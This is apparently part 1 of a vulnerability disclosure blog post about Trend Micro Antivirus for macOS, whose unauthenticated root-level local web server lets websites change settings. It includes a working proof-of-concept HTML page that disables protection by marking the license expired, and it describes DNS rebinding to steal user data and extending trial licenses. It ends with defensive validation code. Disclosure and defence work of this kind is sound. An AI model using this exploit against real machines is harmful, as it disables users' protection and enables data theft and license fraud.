In this 3-part blog post we will take a deep-dive into Trend Micro Antivirus for macOS. In our normal blogs we often detail a single security issue. This time we will dig deeper and look at multiple attack vectors against a single product:
Trend Micro Antivirus offers online security and antivirus protection for macOS devices.
In this post we will look at attacks from the browser. We will try to attack a client that has Trend Micro Antivirus installed and visits our malicious website. We had two specific attacks in mind:
We did not find any exploits in Trend Micro itself, but we did find various other attacks.
Trend Micro installs a local web server listening on 127.0.0.1:37848 and uses it for a form of inter-process communication. For example, the expiration status of the license is queried through it:

```text
% curl 'localhost:37848/GetProperty?Expiration'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>Expiration</key>
	<string>610581599.000000</string>
</dict>
</plist>
```
The web server runs inside the iCoreService process, provided by the iTISPlugin plug-in, and runs as root:

```text
% sudo lsof | grep 37848
COMMAND     PID  USER  FD   TYPE  NAME
iCoreServ   2890 root  11u  IPv4  localhost:37848 (LISTEN)
```
`curl 'localhost:37848/GetProperty?Expiration'` reads the Expiration property. Reversing shows that the backing data is stored in /Library/Application Support/TrendMicro/Plug-in/iTISPlugin.framework/Versions/A/Resources/TMPlugin.plist. The contents of this file are partially encrypted:

```text
% cat TMPlugin.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>00D62AD3522F12420D3A269CE3752750</key>
	<string>2150C0B98A8767711DB1FD28470E633C678B5C494924DA53A5AAB9B2BF3DB2279E987B34033F69C52D5CE4DCB2376D85</string>
	<key>0B6695E9434D90DF02C936E3101FD1FA</key>
	... more data
```
The vulnerability is that these properties can not only be read but also written, and because the web server uses no authentication, any (malicious) website the user visits can modify these settings as well. Some of the (decrypted) setting names sound interesting:

- __EnableWebThreatProtection__
- __EnableScheduledScan__
- lastOneDayLaunchDate
- LastAUTime
- LicenseStatus
- __EnableRealTimeScan__
- ... many more
It looks like this might allow a trivial bypass of Trend Micro: a malicious website disables __EnableWebThreatProtection__ and then launches the real attack. However, the developers seem to have anticipated this and protected some of the properties: all settings whose names start with underscores (e.g. __EnableRealTimeScan__) are protected from modification. This blacklist covers only a small number of properties, though, and a malicious website can still modify the remaining ones. Three example attacks are listed below.
Attack 1 mimics a website that wants to do something malicious, for example install malware that Trend Micro would detect. Using the insecure web server, the website first disables the AV, removing any protection it provided, and then installs the malware undetected.
As discussed before, some of the properties, such as __EnableRealTimeScan__, are protected from modification. The exploit therefore uses another trick: it sets the license to an expired state.
The following screenshots show a full exploit flow:
Source code of the malicious website:

```html
<html>
<head>
<script>
var request = new XMLHttpRequest();
request.open("GET", "http://127.0.0.1:37848/SetProperty?LicenseStatus=2");
request.send();
</script>
</head>
<body><h1>Malicious website</h1></body>
</html>
```
As shown above, malicious websites can set properties, but they cannot read the responses: the browser blocks access to the cross-origin response because the server sends no Cross-Origin Resource Sharing (CORS) headers permitting it.
An attacker can bypass this with DNS rebinding, which makes the browser treat the local server as same-origin and lets the malicious website read the data returned by the API. Attackers can then steal configuration information such as the serial number, e-mail address, etc.
Another attack is to change the settings of the trial license. By updating the expiration time, any user can extend their trial license into a free full version, resulting in lost revenue for Trend Micro.
This issue was reported to the Zero Day Initiative and is tracked as ZDI-20-1243. It was assigned CVE-2020-27013 and patched on 2020-10-14. Additional details are available in Trend Micro's advisory TMKA-09950.
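As an added example (not Trend Micro's code and not from the original post), the request gate a loopback IPC server like this one needs in order to stop all three attacks: strict Host validation against DNS rebinding, refusal of browser-initiated cross-origin requests, a per-session bearer token, and a protected-property list that also covers the license fields abused above. The function names, the token hand-off mechanism and the (allowed, reason) return shape are assumptions.

```python
import hmac
import secrets
from urllib.parse import parse_qsl, urlsplit

# Exactly what the loopback listener is bound to; the Host header must match it.
LISTEN_HOST = "127.0.0.1:37848"
# Hypothetical per-session secret handed to local native clients out of band
# (for example via a root-only file); a web page never learns it.
SESSION_TOKEN = secrets.token_hex(16)
# Read-only regardless of caller: the underscore-prefixed settings plus the
# license fields that the attacks above abused.
READ_ONLY = {"LicenseStatus", "Expiration"}


def is_protected(name: str) -> bool:
    return name.startswith("__") or name in READ_ONLY


def check_request(path: str, headers: dict) -> tuple:
    """Decide whether a request to the IPC server may proceed.

    `headers` maps lower-case header names to values. Returns (allowed, reason).
    """
    url = urlsplit(path)
    params = dict(parse_qsl(url.query, keep_blank_values=True))
    # 1. DNS rebinding: the browser resolves attacker.example to 127.0.0.1, but
    #    the Host header still says attacker.example. Only our own host passes.
    if headers.get("host") != LISTEN_HOST:
        return False, "bad host"
    # 2. Cross-site requests from a browser carry Origin (fetch/XHR) or a
    #    Sec-Fetch-Site other than "none" (img/form/navigation). Local native
    #    clients send neither.
    if "origin" in headers or headers.get("sec-fetch-site", "none") != "none":
        return False, "cross-origin"
    # 3. Reads and writes both need the session token, compared in constant time.
    auth = headers.get("authorization", "")
    if not hmac.compare_digest(auth, "Bearer " + SESSION_TOKEN):
        return False, "missing or wrong token"
    # 4. Endpoint dispatch; writes to protected properties are refused even
    #    with a valid token.
    if url.path == "/GetProperty":
        return True, "read"
    if url.path == "/SetProperty":
        if any(is_protected(name) for name in params):
            return False, "protected property"
        return True, "write"
    return False, "unknown endpoint"
```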
In part 1 of this series we have shown how a malicious website can disable Trend Micro Antivirus before attempting to install malware.
In the next part we will show how a local user can abuse Trend Micro Antivirus to get code execution as root.